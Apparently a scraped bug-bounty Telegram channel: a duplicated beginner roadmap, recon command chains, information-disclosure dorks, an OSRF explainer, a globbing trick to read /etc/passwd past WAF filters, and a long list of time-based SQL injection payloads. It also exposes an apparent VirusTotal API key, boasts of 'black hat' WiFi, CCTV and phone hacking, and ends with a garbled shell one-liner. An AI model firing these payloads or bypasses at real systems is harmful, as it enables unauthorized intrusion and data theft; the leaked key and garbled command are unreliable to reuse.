2025 Roadmap:
1)Portswigger labs:
pick one lab for eg ssrf give it 2-3 days to complete all. for me i complete these types of labs in some hour but dont do that. do with relex mind and with aim for learning not for just completing the labs.
2) HackerOne reports:
next task is to read all reports of same labs like ssrf just focus on one bug and follow the methodlogy and learn real world scanario and try to find same on real world target.
3) Medium writups:
install medium app make acc there and follow all the publications like infosec writups and related to the bug hunting read there articles you will get real world experience i will soon share my all writups also..
4)Bugbountyhunting.com
make acc in that website good for testing your skills and solve there challanges you will get real world experience.
5) CTF
make acc on HTB and Tryhackme solve only webapps labs and rooms there to get more experience.
6)YT
follow some people on yt that show real world poc practicles you will get good understanding in video more then written poc good for beginners..
7)Bookmark
bookmark some website like hacktricks and some github pages like bughunting methodlogy or related to payloads and methods repo you will get all payloads from there.
8)Engage with people or make friend who have same interest and work like team collab with them that will double help you in bug hunting..
9) Dont look for comman bugs:
i see many people ask me why i dont find bugs i spend much time still..the answer is you are findings bugs that are so common like xss and p4 more there are many professional hunter in bbp platform who alrday hunted these on all programs so better to find more advance bugs like dependencies confusion,http request smuggling,bac,auth bypass etc bugs then your chances are more then before..if you are not finding bugs that mean you need to work on more skills and new methods.
10) avoid social media
avoid social media seriouslyy this will consume your so much time there algorithm are so strong that they will ingage your with your interests stufss mostly these will show you love,relationship, breakups, beuty,looks perfections, rich things and other mentally disturbing things like soft porn etc also avoid playing online games plz avoid it if you want to use better to use linkedin twitter etc or related to information sharing apps this will help your mind to focus more on the things that u want..
if you follow these things i am 100% sure you will see results in some months if you are really serious about your life..and i dont think nowdays you need any paid course stufss when the information is alrday free on internet you have all things in your hand you just need to find it also after chatgpt i dont think you need much struggle on all these things make chatgpt as your friend.. also mean while if you need any help regarding any bugs or chaining it always dm me i will sure help when i get time..all the best for your new year jurney ❤️
1)Portswigger labs:
pick one lab for eg ssrf give it 2-3 days to complete all. for me i complete these types of labs in some hour but dont do that. do with relex mind and with aim for learning not for just completing the labs.
2) HackerOne reports:
next task is to read all reports of same labs like ssrf just focus on one bug and follow the methodlogy and learn real world scanario and try to find same on real world target.
3) Medium writups:
install medium app make acc there and follow all the publications like infosec writups and related to the bug hunting read there articles you will get real world experience i will soon share my all writups also..
4)Bugbountyhunting.com
make acc in that website good for testing your skills and solve there challanges you will get real world experience.
5) CTF
make acc on HTB and Tryhackme solve only webapps labs and rooms there to get more experience.
6)YT
follow some people on yt that show real world poc practicles you will get good understanding in video more then written poc good for beginners..
7)Bookmark
bookmark some website like hacktricks and some github pages like bughunting methodlogy or related to payloads and methods repo you will get all payloads from there.
8)Engage with people or make friend who have same interest and work like team collab with them that will double help you in bug hunting..
9) Dont look for comman bugs:
i see many people ask me why i dont find bugs i spend much time still..the answer is you are findings bugs that are so common like xss and p4 more there are many professional hunter in bbp platform who alrday hunted these on all programs so better to find more advance bugs like dependencies confusion,http request smuggling,bac,auth bypass etc bugs then your chances are more then before..if you are not finding bugs that mean you need to work on more skills and new methods.
10) avoid social media
avoid social media seriouslyy this will consume your so much time there algorithm are so strong that they will ingage your with your interests stufss mostly these will show you love,relationship, breakups, beuty,looks perfections, rich things and other mentally disturbing things like soft porn etc also avoid playing online games plz avoid it if you want to use better to use linkedin twitter etc or related to information sharing apps this will help your mind to focus more on the things that u want..
if you follow these things i am 100% sure you will see results in some months if you are really serious about your life..and i dont think nowdays you need any paid course stufss when the information is alrday free on internet you have all things in your hand you just need to find it also after chatgpt i dont think you need much struggle on all these things make chatgpt as your friend.. also mean while if you need any help regarding any bugs or chaining it always dm me i will sure help when i get time..all the best for your new year jurney ❤️
🔥15❤8👍3
Find XSS Using KNOXSS
Find Subdomains (Use the subdomain enumeration techniques that I have already posted.)
Find Subdomains (Use the subdomain enumeration techniques that I have already posted.)
# Subdomain Enumerationsubfinder -d domain -all | tee -a domain.subs
subdominator -d domain | tee -a domain.subs
# Check live subdomains
cat domain.subs | httpx -o domain.live
cat domain.live | wayback |anew xss-wayback
katana -list domain.live -o xss-katana
cat domain.live | gau --subs -o xss-gau
# Merge All results
cat xss-wayback xss-katana xss-gau |anew xss.txt
cat domain.live | wayback |anew xss-wayback
katana -list domain.live -o xss-katana
cat domain.live | gau --subs -o xss-gau
# Merge All results
cat xss-wayback xss-katana xss-gau | anew xss.txt
cat xss.txt |sort -u | grep "=" | egrep -iv ".(css|woff|woff2|txt|js|m4r|m4p|m4b|ipa|asa|pkg|crash|asf|asx|wax|wmv|wmx|avi|bmp|class|divx|doc|docx|exe|gif|gz|gzip|ico|jpg|jpeg|jpe|webp|json|mdb|mid|midi|mov|qt|mp3|m4a|mp4|m4v|mpeg|mpg|mpe|webm|mpp|_otf|odb|odc|odf|odg|odp|ods|odt|ogg|pdf|png|pot|pps|ppt|pptx|ra|ram|svg|svgz|swf|tar|tif|tiff|_ttf|wav|wma|wri|xla|xls|xlsx|xlt|xlw|zip)" | uro | httpx | anew xss
#Run knoxnl With GET & POST Methods
knoxnl -i xss.txt -X BOTH -s -o xssoutput.txt
2❤24👍8🔥6👎2
Live Bug Bounty Hunting: The Ultimate Checklist to Level Up Your Skills | Bugcrowd | part-(1)
https://youtu.be/2nYDs_yDCXI?si=mjZRs5eNVIUhs0tO
https://youtu.be/2nYDs_yDCXI?si=mjZRs5eNVIUhs0tO
❤11👍5🔥3
🔖 On-Site Request Forgery (OSRF): An Overview
🚨On-Site Request Forgery (OSRF) is a lesser-known but impactful vulnerability similar to Cross-Site Request Forgery (CSRF). While both involve unauthorized actions performed on behalf of an authenticated user, the fundamental distinction lies in the request origin.
- CSRF: The attacker initiates requests from their controlled domain to exploit a victim's authenticated session.
- OSRF: The requests originate from the vulnerable application itself, and the attacker controls where the requests are directed.
---
🔍 Where to Find OSRF Vulnerabilities
1. Reflected Inputs in
Look for inputs that can be reflected in attributes like
👉 If the input can be manipulated, it may allow the attacker to direct requests to their desired endpoints.
2. Sensitive Endpoints Using the GET Method
Endpoints performing sensitive actions with GET requests are prime targets for OSRF. For example:
If such endpoints exist and can be controlled via reflected input, they may be exploited for OSRF.
⚠️ Best Practices for Prevention
1. Avoid GET Methods for Sensitive Actions
Use POST methods for actions involving sensitive changes, as they require more intentional execution.
2. Validate and Sanitize Inputs
Ensure all user inputs, especially those reflected in attributes like
3. Implement Content Security Policies (CSP)
CSPs can limit where resources like images or iframes can be loaded from, reducing the risk of external request manipulation.
4. Monitor and Audit Application Behavior
Regularly test your application for unusual or unintended request behaviors to identify vulnerabilities early.
This additional layer of security awareness helps ensure OSRF vulnerabilities are addressed alongside CSRF for a more robust application defense.
Learn More: https://github.com/daffainfo/AllAboutBugBounty/blob/master/On%20Site%20Request%20Forgery.md
🚨On-Site Request Forgery (OSRF) is a lesser-known but impactful vulnerability similar to Cross-Site Request Forgery (CSRF). While both involve unauthorized actions performed on behalf of an authenticated user, the fundamental distinction lies in the request origin.
- CSRF: The attacker initiates requests from their controlled domain to exploit a victim's authenticated session.
- OSRF: The requests originate from the vulnerable application itself, and the attacker controls where the requests are directed.
---
🔍 Where to Find OSRF Vulnerabilities
1. Reflected Inputs in
src Attributes Look for inputs that can be reflected in attributes like
src. Example vulnerable tags: html
<img src="OUR_INPUT_HERE">
<video width="400" height="200" controls src="OUR_INPUT_HERE">
<audio src="OUR_INPUT_HERE">
<iframe src="OUR_INPUT_HERE">
👉 If the input can be manipulated, it may allow the attacker to direct requests to their desired endpoints.
2. Sensitive Endpoints Using the GET Method
Endpoints performing sensitive actions with GET requests are prime targets for OSRF. For example:
GET /settings.php?remove_account=1
Host: example.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0
If such endpoints exist and can be controlled via reflected input, they may be exploited for OSRF.
⚠️ Best Practices for Prevention
1. Avoid GET Methods for Sensitive Actions
Use POST methods for actions involving sensitive changes, as they require more intentional execution.
2. Validate and Sanitize Inputs
Ensure all user inputs, especially those reflected in attributes like
src, are properly validated and sanitized. 3. Implement Content Security Policies (CSP)
CSPs can limit where resources like images or iframes can be loaded from, reducing the risk of external request manipulation.
4. Monitor and Audit Application Behavior
Regularly test your application for unusual or unintended request behaviors to identify vulnerabilities early.
This additional layer of security awareness helps ensure OSRF vulnerabilities are addressed alongside CSRF for a more robust application defense.
Learn More: https://github.com/daffainfo/AllAboutBugBounty/blob/master/On%20Site%20Request%20Forgery.md
GitHub
AllAboutBugBounty/On Site Request Forgery.md at master · daffainfo/AllAboutBugBounty
All about bug bounty (bypasses, payloads, and etc) - daffainfo/AllAboutBugBounty
❤15👍6
subdomainRecon.txt
3.1 KB
I have given this file because many of my subscribers requested it. However, I would like to make one request to you, that is, share my YouTube channel and Telegram channel more.
👍37❤🔥15❤11🔥5🥰2
💻 All About Bug Bounty - Updated!
🔥https://github.com/daffainfo/AllAboutBugBounty
#BugBounty #bugbountytips
🔥https://github.com/daffainfo/AllAboutBugBounty
#BugBounty #bugbountytips
👍19🔥5❤🔥2❤2🥰1🗿1
https://web.archive.org/cdx/search/cdx?url=*.example.com/*&collapse=urlkey&output=text&fl=original
https://www.virustotal.com/vtapi/v2/domain/report?apikey=982680b1787fa59701919aa22515a025e00df1e3bb2bc4f186b8e919558d576c&domain=example.com
https://otx.alienvault.com/api/v1/indicators/hostname/domain.com/url_list?limit=500&page=1
curl -G "https://web.archive.org/cdx/search/cdx" --data-urlencode "url=*.example.com/*" --data-urlencode "collapse=urlkey" --data-urlencode "output=text" --data-urlencode "fl=original" > out.txt
cat out.txt | uro | grep -E '\.xls|\.xml|\.xlsx|\.json|\.pdf|\.sql|\.doc|\.docx|\.pptx|\.txt|\.zip|\.tar\.gz|\.tgz|\.bak|\.7z|\.rar|\.log|\.cache|\.secret|\.db|\.backup|\.yml|\.gz|\.config|\.csv|\.yaml|\.md|\.md5|\.exe|\.dll|\.bin|\.ini|\.bat|\.sh|\.tar|\.deb|\.rpm|\.iso|\.img|\.apk|\.msi|\.dmg|\.tmp|\.crt|\.pem|\.key|\.pub|\.asc'
❤22💩18👍7🔥4🍌2
Well, many of you will notice that I have not been posting any videos lately. This is because I have been recharging with black hack hacking for some time now. I am recharging with many things like WiFi hacking 📡as many ways as possible and Bluetooth hacking🚦 and CCTV camera hacking📸 mobile hacking📱 and many more things that I will use in my real life. But if I feel that I need to bring a video or course on this topic, then I will definitely bring it and let you know my opinion.
❤48🖕9👍6❤🔥5
☄️Information Disclosure Dork☄️
site:*.example.com (ext:doc OR ext:docx OR ext:odt OR ext:pdf OR ext:rtf OR ext:ppt OR ext:pptx OR ext:csv OR ext:xls OR ext:xlsx OR ext:txt OR ext:xml OR ext:json OR ext:zip OR ext:rar OR ext:md OR ext:log OR ext:bak OR ext:conf OR ext:sql)🔥24❤5👎3
A neat trick for bypassing WAF/filters while testing for OS command injection vulnerabilities.
Use shell globbing / wildcard expansion. Here is an example
Before cat runs, the shell expands the glob pattern /e*c/p*s*d to match actual files and directories in the filesystem.
#bugbountytips #hacking
Use shell globbing / wildcard expansion. Here is an example
cat /e*c/p*s*d is equivalent to cat /etc/passwd. But how? Before cat runs, the shell expands the glob pattern /e*c/p*s*d to match actual files and directories in the filesystem.
/e*c: The shell interprets this as "any path starting with /e, followed by zero or more characters (*), ending with c."/p*s*d: This matches a path or file name starting with p, followed by zero or more characters (*), then s, then zero or more characters (*), then d#bugbountytips #hacking
🔥24❤6👍3🤡3❤🔥2
timebased payloads for different dbms:
XOR(if(now()=sysdate(),sleep(7),0))XOR%23
'or sleep(7)--#
'or sleep(7)#
'or sleep(7)='#
'or sleep(7)='--
'/*F*/or/*F*/sleep(7)='
'or sleep(7)--%23
'or sleep(7)%23
'or sleep(7);%00
or sleep(7)--+-
or sleep(7)#
'/*f*/or/*f*/sleep/*f*/(7)--#
'/*f*/or/*f*/sleep/*f*/(7)#
or sleep(7)%23
'/*f*/or/*f*/sleep/*f*/(7)--%23
'/*f*/or/*f*/sleep/*f*/(7)%23
'/*f*/or/*f*/sleep/*f*/(7);%00
or/*f*/sleep/*f*/(7)--+-
or/*f*/sleep/*f*/(7)#
'XOR(if(now()=sysdate(),sleep(7),0))XOR'
'OR(if(now()=sysdate(),sleep(7),0))--#
'OR(if(now()=sysdate(),sleep(7),0))#
or/*f*/sleep/*f*/(7)%23
'OR(if(now()=sysdate(),sleep(7),0))--%23
'OR(if(now()=sysdate(),sleep(7),0))%23
'OR(if(now()=sysdate(),sleep(7),0));%00
OR(if(now()=sysdate(),sleep(7),0))--+-
OR(if(now()=sysdate(),sleep(7),0))#
OR(if(now()=sysdate(),sleep(7),0))%23
'WAITFORDELAY'0:0:7';%00
'WAITFORDELAY'0:0:7'#
'WAITFORDELAY'0:0:7'%23
'WAITFORDELAY'0:0:7';%00
WAITFORDELAY'0:0:7'#
WAITFORDELAY'0:0:7'%23
WAITFORDELAY'0:0:7'--+-
'WAITFORDELAY'0:0:7'--+-
'WAITFORDELAY'0:0:7'='
\/*F*/or/*f*/sleep(7)%23
'/*f*/OR/*f*/pg_sleep(7)#
'/*f*/OR/*f*/pg_sleep(7)%23
'/*f*/OR/*f*/pg_sleep(7);%00
/*f*/OR/*f*/pg_sleep(70)--+-
/*f*/OR/*f*/pg_sleep(70)#
/*f*/OR/*f*/pg_sleep(70)%23
'/*f*/OR/*f*/pg_sleep(7)=';%00
\)/*F*/or/*f*/sleep(7)%23
\)/*F*/or/*f*/sleep(7)%23
%E2%84%A2%27/*F*/or/*f*/sleep(7)%23
%E2%84%A2%27/*F*/or/*f*/pg_sleep(7)%23
%E2%84%A2%22/*F*/or/*f*/pg_sleep(7)%23
%E2%84%A2%22/*F*/or/*f*/sleep(7)%23
%E2%84%A2%22/*F*/or/*f*/sleep(7)--+-
%E2%84%A2\)/*F*/or/*f*/sleep(7)--+-
%E2%84%A2%27)/*F*/or/*f*/sleep(7)--+-
%E2%84%A2'/*F*/or/*f*/sleep(7)='
%E2%84%A2')/*F*/or/*f*/sleep(7)='
👍26❤14🔥10💩5🖕4
☄️IDOR Forge is an advanced and versatile tool designed to detect Insecure Direct Object Reference (IDOR) vulnerabilities in web applications.
🛍https://github.com/errorfiathck/IDOR-Forge
🛍https://github.com/errorfiathck/IDOR-Forge
❤25👍7💩2🖕2👏1👾1
waybackurls HOSTS | tac | sed "s#\\\/#\/#g" | egrep -o "src['\"]?
15*[=: 1\5*[ '\"]?[^'\"]+.js[^'|"> ]*" | awk -F '/'
'{if(length($2))print "https://"$2}' | sort -fu | xargs -I '%' sh
-c "curl -k -s \"%)" | sed \"s/[;}\)>]/\n/g\" | grep -Po \" (L'1|\"](https?: )?[/1{1,2}[^'||l"> 1{5,3)|(\.
(get|post|ajax|load)\s*\(\5*['||\"](https?:)?[/1{1,2}[^'||\"> ]
{5,})\"" | awk -F "['|"]" '{print $2}' sort -fu
❤33🔥11👍7👎1